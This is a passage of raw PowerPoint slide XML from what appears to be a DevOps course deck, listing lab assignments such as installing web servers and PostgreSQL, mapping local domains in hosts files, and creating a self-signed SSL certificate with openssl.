                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write down the basic structure of HTML5</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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9" name="Shape 4249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4250" name="Google Shape;4250;p689"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1386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#2 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4251" name="Google Shape;4251;p689"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616500" y="711350"/>
            <a:ext cx="8059800" cy="4378500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Install Centos 7.x in VirtualBox/VmWare</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Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> web server</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Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres</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Create 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user with one database each</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Create 2 tables in each</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Export database</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Remove database</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Import the exported database</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Install PGAdmin and access at ????</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Go to /var/www/html</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Open index.html with VIM and delete all lines</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Install WinSCP on Host Machine and edit /var/www/html/index.html file with VSCode Editor</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Write down the basic structure of HTML5</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-327025" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1550"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a git repo and upload the source and generate a GitHub page URL</a:t>
            </a:r>
            <a:endParaRPr sz="1550">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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5" name="Shape 4255"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4256" name="Google Shape;4256;p690"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692700" y="958350"/>
            <a:ext cx="8147400" cy="3509400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-407669" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2820"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create local domain and get ssl certificate using apache2 on windows os with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virtualBox.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.anildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2620">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2620">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-394970" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2620"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create local domain and get ssl certificate using nginx on windows os with virtualBox</a:t>
            </a:r>
            <a:endParaRPr sz="2620">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3320">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2620">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.vishal.com</a:t>
            </a:r>
            <a:endParaRPr sz="2620">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4257" name="Google Shape;4257;p690"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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#3 Assignments for DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4261"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4262" name="Google Shape;4262;p691"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="791225"/>
            <a:ext cx="8520600" cy="40944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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install ubuntu 24.x</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install apache2</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vim /etc/hosts (Linux)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edit C:\Windows\System32\drivers\etc\hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Windows).</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add line at the bottom </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.35 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.anildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>127.0.0.1      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.sunildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.   mkdir /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.anildollor.com</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6.   vim /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.anildollor.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.   v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>im /etc/apache2/sites-available/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.anildollor.com.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4263" name="Google Shape;4263;p691"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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Working with Fake Domain</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4267"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4268" name="Google Shape;4268;p692"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="958350"/>
            <a:ext cx="8520600" cy="40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AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11. Create a Self-Signed SSL Certificate</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/www.anildollor.com.key -out /etc/ssl/certs/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.anildollor.com.crt</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4269" name="Google Shape;4269;p692"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2593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#3 Assignments for DevOps Cont..</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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3" name="Shape 4273"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4274" name="Google Shape;4274;p693"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="791225"/>
            <a:ext cx="8520600" cy="40944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rgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install ubuntu 24.x</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install apache2</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go to domain panel and create A record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with “news”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to point to server IP</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.   mkdir /var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>news.vishalmahawar.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>shop</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
